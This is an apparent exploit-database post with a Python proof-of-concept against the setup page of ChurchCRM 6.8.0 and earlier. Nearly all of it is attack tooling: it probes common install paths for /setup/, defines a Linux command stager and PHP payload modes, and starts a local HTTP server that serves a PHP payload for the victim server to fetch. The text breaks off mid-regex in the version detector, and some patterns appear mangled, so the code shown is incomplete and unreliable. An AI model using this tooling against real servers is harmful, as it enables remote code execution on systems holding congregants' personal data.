=============================================================================================================================================
| # Title : ChurchCRM ≤ 6.8.0 – Setup Page Security Misconfiguration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/ChurchCRM/ |
=============================================================================================================================================
[+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions.
If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters.
This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations.
Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import random
import string
import sys
import time
import logging
import re
import socket
import threading
import http.server
import socketserver
from urllib.parse import urljoin, urlparse, quote
from typing import Optional, Dict, Any, Tuple, List, Union
from dataclasses import dataclass, field
from enum import Enum
from functools import wraps
import json
import requests
from requests.exceptions import RequestException
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
VERSION = "2.0.0"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
TIMEOUT = 30
MAX_RETRIES = 3
DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch']
class ExploitError(Exception):
"""Base exception for exploit errors"""
pass
class TargetUnreachableError(ExploitError):
"""Target is not reachable"""
pass
class InjectionFailedError(ExploitError):
"""Failed to inject payload"""
pass
class PayloadServerError(ExploitError):
"""Payload server error"""
pass
class VersionDetectionError(ExploitError):
"""Version detection error"""
pass
class TargetType(Enum):
"""Target platform types"""
LINUX_CMD_STAGER = "linux_cmd_stager"
PHP_MEMORY = "php_memory"
PHP_FETCH = "php_fetch"
class CheckCode(Enum):
"""Check result codes"""
SAFE = "safe"
VULNERABLE = "vulnerable"
UNKNOWN = "unknown"
UNREACHABLE = "unreachable"
@dataclass
class TargetInfo:
"""Target information"""
url: str
base_path: str
scheme: str
host: str
port: int
version: Optional[str] = None
vulnerable: Optional[bool] = None
detected_paths: List[str] = field(default_factory=list)
@dataclass
class ExploitResult:
"""Exploit result"""
success: bool
session: Optional[requests.Session] = None
message: str = ""
target: Optional[TargetInfo] = None
output: Optional[str] = None
class Version:
"""Advanced version handling"""
def __init__(self, version_string: str):
self.original = version_string
self.clean = self._clean_version(version_string)
self.parts = self._parse_parts(self.clean)
self.suffix = self._extract_suffix(version_string)
def _clean_version(self, version: str) -> str:
"""Clean version string"""
match = re.search(r'(\d+\.\d+(?:\.\d+)?)', version)
return match.group(1) if match else '0.0.0'
def _parse_parts(self, version: str) -> List[int]:
"""Parse version into integer parts"""
parts = []
for part in version.split('.'):
try:
parts.append(int(part))
except ValueError:
parts.append(0)
return parts
def _extract_suffix(self, version: str) -> str:
"""Extract suffix (e.g., -beta2, -RC1)"""
match = re.search(r'[-_]([a-zA-Z]+\d*)$', version)
return match.group(1) if match else ''
def __lt__(self, other: Union[str, 'Version']) -> bool:
"""Less than comparison"""
if isinstance(other, str):
other = Version(other)
for i in range(max(len(self.parts), len(other.parts))):
v1 = self.parts[i] if i < len(self.parts) else 0
v2 = other.parts[i] if i < len(other.parts) else 0
if v1 < v2:
return True
if v1 > v2:
return False
if self.suffix and not other.suffix:
return True # Has suffix is considered older
if not self.suffix and other.suffix:
return False
return False
def __le__(self, other: Union[str, 'Version']) -> bool:
"""Less than or equal"""
return self < other or self == other
def __eq__(self, other: Union[str, 'Version']) -> bool:
"""Equal comparison"""
if isinstance(other, str):
other = Version(other)
return self.parts == other.parts and self.suffix == other.suffix
def __str__(self) -> str:
return self.original
def __repr__(self) -> str:
return f"Version('{self.original}')"
def safe_urljoin(base: str, path: str) -> str:
"""
Safely join URL parts handling base paths correctly
Examples:
>>> safe_urljoin('http://example.com/churchcrm', '/setup/')
'http://example.com/churchcrm/setup/'
>>> safe_urljoin('http://example.com/churchcrm/', 'setup/')
'http://example.com/churchcrm/setup/'
"""
base = base.rstrip('/')
if path.startswith('/'):
parsed = urlparse(base)
base_without_path = f"{parsed.scheme}://{parsed.netloc}"
base_path = parsed.path.rstrip('/')
return f"{base_without_path}{base_path}{path}"
else:
return f"{base}/{path.lstrip('/')}"
def normalize_url(url: str) -> str:
"""Normalize URL by adding scheme if missing and removing trailing slash"""
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
return url.rstrip('/')
def parse_target(url: str) -> TargetInfo:
"""Parse target URL and return TargetInfo"""
url = normalize_url(url)
parsed = urlparse(url)
return TargetInfo(
url=url,
base_path=parsed.path.rstrip('/') or '/',
scheme=parsed.scheme,
host=parsed.hostname,
port=parsed.port or (443 if parsed.scheme == 'https' else 80),
)
def discover_base_path(session: requests.Session, base_url: str,
paths: List[str] = None, logger: logging.Logger = None) -> Optional[str]:
"""
Discover the correct base path by trying common paths
"""
if paths is None:
paths = DEFAULT_PATHS
parsed = urlparse(base_url)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in paths:
test_url = f"{base}{path}" if path else base
try:
setup_url = safe_urljoin(test_url, '/setup/')
if logger:
logger.debug(f"Trying path: {setup_url}")
response = session.get(setup_url, timeout=5, allow_redirects=False)
if response.status_code in [200, 301, 302]:
if logger:
logger.info(f"Found ChurchCRM at: {test_url}")
return test_url
except:
continue
return None
class ColoredFormatter(logging.Formatter):
"""Custom formatter with colors"""
COLORS = {
'DEBUG': '\033[36m',
'INFO': '\033[32m',
'WARNING': '\033[33m',
'ERROR': '\033[31m',
'CRITICAL': '\033[35m',
'RESET': '\033[0m'
}
def format(self, record):
levelname = record.levelname
if levelname in self.COLORS:
record.levelname = f"{self.COLORS[levelname]}{levelname}{self.COLORS['RESET']}"
return super().format(record)
def setup_logger(debug: bool = False) -> logging.Logger:
"""Setup logger with appropriate configuration"""
logger = logging.getLogger('churchcrm_exploit')
logger.setLevel(logging.DEBUG if debug else logging.INFO)
if not logger.handlers:
handler = logging.StreamHandler(sys.stdout)
formatter = ColoredFormatter(
'%(asctime)s [%(levelname)s] %(message)s',
datefmt='%H:%M:%S'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def create_session(retries: int = MAX_RETRIES) -> requests.Session:
"""Create requests session with retry logic"""
session = requests.Session()
retry_strategy = Retry(
total=retries,
backoff_factor=0.5,
status_forcelist=[500, 502, 503, 504],
allowed_methods=["HEAD", "GET", "OPTIONS", "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)
session.headers.update({
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
})
return session
def random_string(length: int = 8) -> str:
"""Generate random string"""
return ''.join(random.choices(string.ascii_lowercase, k=length))
def random_int_string(min_len: int = 5, max_len: int = 10) -> str:
"""Generate random integer as string"""
length = random.randint(min_len, max_len)
return ''.join(random.choices(string.digits, k=length))
def random_url() -> str:
"""Generate random URL"""
return f"http://{random_string(8)}.com/"
class PayloadHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP handler for serving payloads"""
payload = None
logger = None
request_count = 0
def do_GET(self):
"""Handle GET request"""
PayloadHandler.request_count += 1
if self.logger:
self.logger.debug(f"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}")
if self.payload:
self.send_response(200)
self.send_header('Content-Type', 'application/x-httpd-php')
self.send_header('Content-Length', str(len(self.payload)))
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.end_headers()
self.wfile.write(self.payload.encode())
if self.logger:
self.logger.info(f"Served payload to {self.client_address[0]}")
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
"""Override to use our logger"""
if self.logger and self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(f"Payload server: {format % args}")
class PayloadServer:
"""HTTP server for serving payloads"""
def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0):
self.logger = logger
self.host = host
self.port = port
self.server = None
self.thread = None
self.payload = None
def start(self, payload: str) -> str:
"""Start payload server and return URL"""
self.payload = payload
PayloadHandler.payload = payload
PayloadHandler.logger = self.logger
PayloadHandler.request_count = 0
self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)
self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.server_bind()
self.server.server_activate()
self.port = self.server.server_address[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
server_url = f"http://{self.get_local_ip()}:{self.port}/"
self.logger.info(f"Payload server started at {server_url}")
return server_url
def stop(self):
"""Stop payload server"""
if self.server:
self.server.shutdown()
self.server.server_close()
self.logger.debug(f"Payload server stopped (served {PayloadHandler.request_count} requests)")
def get_local_ip(self) -> str:
"""Get local IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip
def wait_for_requests(self, timeout: int = 10) -> bool:
"""Wait for at least one request"""
start = time.time()
while time.time() - start < timeout:
if PayloadHandler.request_count > 0:
return True
time.sleep(0.5)
return False
class VersionDetector:
"""Detect ChurchCRM version from response"""
def __init__(self, logger: logging.Logger):
self.logger = logger
self.patterns = [
(re.compile(r'CRM-VERSION:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'header'),
(re.compile(r']*name=["\']version["\'][^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'meta'),
(re.compile(r']*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^>]*name=["\']version', re.I), 'meta'),
(re.compile(r'